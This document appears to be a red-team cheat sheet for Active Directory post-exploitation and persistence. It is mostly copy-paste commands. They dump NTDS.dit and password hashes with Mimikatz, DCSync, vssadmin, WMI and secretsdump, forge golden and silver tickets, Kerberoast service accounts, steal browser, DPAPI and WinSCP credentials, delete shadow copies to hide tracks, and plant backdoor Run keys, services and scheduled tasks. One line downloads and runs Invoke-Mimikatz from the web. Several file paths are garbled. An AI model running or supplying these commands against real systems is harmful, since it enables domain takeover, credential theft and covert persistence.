# Post exploitation techniques **DC SHADOW** `# DC Shadow is a post compromission attack, allowing you to update replication metadata`\ `# On a compromised client, using a domain admin account`\ `# You can attack with Mimikatz`\ \ `# Terminal 1 (runas)`\ `mimikatz # !+`\ `mimikatz # !processtoken`\ `mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42`\ \ `# Terminal 2 (runas)`\ `mimikatz # lsadump::dcshadow /push`\ \ `# You can check the success throught repadmin on the DC`\ `repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"` **NTDS database** `# Initial location of the NTDS database on the domain controller`\ `C:\WindowsTDSTDS.dit`\ \ `# Step 1 → Finding a way to get the NDTS.dis and SYSTEM file`\ `# Step 2 → Crack/Analyze offline`\ \ **Local Extraction** \ **VSSadmin** \ `# Récupération via VSSadmin`\ `# Create a Volume Shadow Copy`\ `C:\Windows\system32> vssadmin create shadow /for=C:`\ \ `# Retrieve NTDS from the copy`\ `C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windowstdstds.dit c:\Extracttds.dit`\ \ `# Copy SYSTEM file`\ `C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS`\ `C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM`\ \ `# Delete tracks`\ `C:\Windows\system32> vssadmin delete shadows /shadow={uuid}`\ \ `# Trick if you are on a semi-interactive shell`\ `# You can specify /quiet option to not get the prompt`\ `# Can be usefull for deletion (as it require to confirm)`\ `vssadmin delete shadows /shadow={uuid} /quiet`\ \ **ntdsutil tool** \ `# ntdsutil is a builtin tool used to manage the AD`\ `# You can abuse it and create a backup of the ntds.dit file`\ `ntdsutil`\ `activate instance ntds`\ `ifm`\ `create full C:tdsutil`\ `quit`\ `quit`\ \ **DC Sync / Mimikatz** \ `# DC Sync is a less noisy way to extract users informations`\ `# It uses the DRS (Directory Replication Service)`\ \ `# Classic`\ `mimikatz # lsadump::dcsync /domain:domain.lan /all /csv`\ \ `# Specific user`\ `mimikatz # lsadump::dcsync /domain:domain.lan /user:test`\ \ **PowerSploit** \ `# PowerSploit contains a script using the volume shadow copy service`\ `Import-Module .\VolumeShadowCopyTools.ps1`\ `New-VolumeShadowCopy -Volume C:\`\ `Get-VolumeShadowCopy`\ \ `# Also possible through a meterpreter session`\ `powershell_shell`\ `New-VolumeShadowCopy -Volume C:\`\ `Get-VOlumeShadowCopy`\ \ **Invoke-DCSync** \ `# Powershell script`\ `# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz`\ `Invoke-DCSync`\ \ `# Get other format (user:id:lm:ntlm)`\ `Invoke-DCSync -PWDumpFormat`\ `# It is also possible through a meterpreter session`\ \ **Nishang** `# Nishang is a post exploitation framework allowing attacker to perform attacks`\ `# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files`\ `Import-Module .\Copy-VSS.ps1`\ `Copy-VSS`\ `Copy-VSS -DestinationDir C:\ShadowCopy\`\ \ `# You can also use them throught a meterpretrer session by loading the powershell extension`\ `load powershell`\ `powershell_import /root/Copy-VSS.ps1`\ `powershell_execute Copy-VSS`\ \ `# Also possible to establish a direct connection`\ `powershell_shell`\ `PS > Copy-VSS`\ `PS > Copy-VSS -DestinationDir C:inja`\ \ **Remote Extraction** \ **CrackMapExec** \ `crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi`\ \ **WMI - Remote**\ `# It is possible to remotely extract the NTDS database using WMI and VSSADMIN`\ `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"`\ `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"`\ `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"`\ \ \ **Impacket** \ `$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\ \ `$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\ \ **NTDS Extraction and analysis** \ `# Impacket provides a usefull script to do that (decrypt copied files)`\ `impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit DOMAIN`\ \ `# Also possible to dump it remotely by using the computer account and its hash`\ `impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1`\ \ `# Extraction is also possible using NTDSDumpEx`\ `NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive`\ \ `# Or adXtract`\ `./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab`\ \ **Empire** \ `# Empire has 2 modules you can use to retrieve hashes through DCSync`\ `usemodule credentials/mimikatz/dcsync_hashdump`\ `usemodule credentials/mimikatz/dcsync` **Ticket generation from Linux** \ `# Generate a ticket or convert it (kekeo) to ccache format`\ `$ ticketer.py -nthash -domain-sid -domain `\ \ `# Export the path in the right variable`\ `$ export KRB5CCNAME=/tmp/ticket.ccache`\ `$ klist`\ \ `# Exec and use the ticket`\ `$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host`\ \ `# Dump NTDS`\ `$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss`\ \ **Golden Ticket** \ `# Golden Ticket`\ `> Nom du compte administrateur (Administrateur)`\ `> Nom complet du domaine (domain.local)`\ `> SID du domaine (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]`\ `> Hash NTLM du compte krbtgt (6194bd1a5bf3ecd542e8aac9860bddf0)`\ \ `mimikatz # privilege:debug`\ `mimikatz # lsadump::lsa /inject /name:krbtgt`\ \ `mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt`\ \ `Use :`\ `mimikatz # kerberos::ptt domain.local.kirbi`\ `mimikatz # kerberos::list`\ \ `# Resource`\ `https://twitter.com/mpgn_x64/status/1241688547037532161`\ \ `# Golden ticket and access denied ?`\ `# from cmd (elevated)`\ `> mimikatz kerberos::golden`\ `> klist add_bind `\ `> psexec \\dc\ cmd`\ \ **Playing with tickets on Windows** \ `# Sessions en cours`\ `mimikatz # sekurlsa::logonpasswords`\ \ `# Ticket TGT`\ `# Dump SPN`\ `PS C:\> Find-PSServiceAccounts -DumpSPN`\ `Discovering service account SPNs in the AD Domain foo.local`\ `svcSQLServ/pc1.foo.local:1433`\ \ `# Download Mimikatz`\ `PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')`\ `PS C:\> Invoke-Mimikatz`\ `mimikatz(powershell) # sekurlsa::logonpasswords`\ `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`\ \ `# Lister les tickets actifs ou les purger`\ `PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'`\ `PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'`\ `PS C:\> klist`\ \ `# Demander un ticket`\ `PS C:\> Add-Type -AssemblyName System.IdentityModel`\ `PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"`\ \ `# Exporter un ticket`\ `mimikatz # kerberos::list /export`\ \ `# Crack Ticket`\ `python tgsrepcrack.py wordlist.txt ticket.kirbi` **Tips** \ `# Getting passwords from browser memory`\ `procdump.exe -ma firefox_pid`\ `strings.exe firefox.dmp | findstr /i "Passwd="`\ \ **Scavenger** \ `# Scavenger is a tool used above CrackMapExec to automate the process`\ `# of looking for sensitive files and informations during Internal Pentest`\ `python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local`\ \ `$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite`\ \ **WinSCP** \ `# WinSCP is potentially exploitable in the registry if not using a master password`\ `# You can manually request the key`\ `reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"`\ `reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"`\ \ `# Then let s recover the password using the following binary`\ `https://github.com/anoopengineer/winscppasswd/releases`\ `.\winscppasswd ip user`\ \ `# Automatisation using CrackMapExec`\ `# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP`\ `crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher`\ \ **Snaffler**\ `https://github.com/SnaffCon/Snaffler`\ \ `# Snaffler is a tool made to automate information gathering on windows and domains`\ `# it focuses location such as network shares etc.`\ \ `snaffler.exe -s -o snaffler.log`\ \ `-o Enables outputting results to a file. You probably want this if youre not using -s. e.g. -o C:\usershing\snaffler.log`\ \ `-s Enables outputting results to stdout as soon as theyre found. You probably want this if you re not using -o.`\ \ `-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug`\ \ `-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.`\ \ `-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.`\ \ `-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.`\ \ `-d Domain to search for computers to search for shares on to search for files in. Easy.`\ \ `-c Domain controller to query for the list of domain computers.`\ \ `-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.`\ \ `-j How many bytes of context either side of found strings in files to show, e.g. -j 200`\ \ `-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.`\ \ \ **DonPAPI**\ `https://github.com/login-securite/DonPAPI`\ `# Dumping revelant information on compromised targets without AV detection`\ `# With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.`\ \ `# Currently gathered info`\ `# - Windows credentials (Taskscheduled credentials & a lot more)`\ `# - Windows Vaults`\ `# - Windows RDP credentials`\ `# - AdConnect (still require a manual operation)`\ `# - Wifi key`\ `# - Intenet explorer Creentials`\ `# - Chrome cookies & credentials`\ `# - Firefox cookies & credentials`\ `# - VNC passwords`\ `# - mRemoteNG password (with default config)`\ \ `# Classic launch`\ `DonPAPI.py domain/user:passw0rd@target`\ \ `# Using hash`\ `DonPAPI.py --hashes : domain/user@target`\ \ `# Using Kerberos or local auth`\ `DonPAPI.py -k domain/user@target`\ `DonPAPI.py -local_auth user@target`\ \ `# If user has LAPS reading privilege`\ `DonPAPI.py -laps domain/user:passw0rd@target`\ \ `# If you are domain admin, you can dump the domain backup key using impacket`\ `# Then you can use the PVK (backup key) to dump all users secrets`\ `dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip`\ `python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`
**PERSISTENCE** **Resources** \ `https://rastamouse.me/2018/03/a-view-of-persistence/`\ \ **Userland & Elevated** \ `# Userland techniques`\ \ `# HKCU`\ `# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).`\ `Value name: Backdoor`\ `Value data: C:\Usersasta\AppData\Localemp\backdoor.exe`\ \ `# Start-up`\ `# Create a batch script in the user startup folder.`\ `PS C:\> gc C:\Usersasta\AppDataoaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat`\ `start /b C:\Usersasta\AppData\Localemp\backdoor.exe`\ \ `# Scheduled Tasks`\ `PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"`\ `PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"`\ `PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"`\ `PS C:\> $S = New-ScheduledTaskSettingsSet`\ `PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\ `PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\ \ `# Powershell profiles`\ `# You can backdoor the powershell profile`\ `PS C:\> Test-Path $profile`\ `False`\ \ `PS C:\> New-Item -Path $profile -Type File –Force`\ \ `Directory: C:\Usersasta\Documents\WindowsPowerShell`\ \ `Mode LastWriteTime Length Name`\ `---- ------------- ------ ----`\ `-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1`\ \ `PS C:\> $string = 'Start-Process "cmd.exe"'`\ `PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append`\ \ `# Elevated techniques`\ \ `# HKLM`\ `# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows`\ `Value name: Backdoor`\ `Value data: C:\Windowsemp\backdoor.exe`\ \ `# Services`\ `# Create a service that will start automatically or on-demand.`\ `PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."`\ \ `# Scheduled Tasks`\ `PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"`\ `PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am`\ `PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest`\ `PS C:\> $S = New-ScheduledTaskSettingsSet`\ `PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\ `PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\ \ **Maintaining Privilege** \ `# Steal passwords and use them with runas`\ `runas /netonly /user:FS01\Administrator cmd`\ \ `# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.`\ `# Both domain accounts and local accounts can work.`\ `mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt`\ \ `# Adding new local users can be a method to get back into machines`\ `# Administrators local group is a solution, but you can also use the following groups`\ `Remote Desktop Users`\ `Remote Management Users`\ `Backup Operators`\ \ `# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.`\ `mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt`\ \ `# Golden tickets can be used to forge access to any service in the domain.`\ `mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt`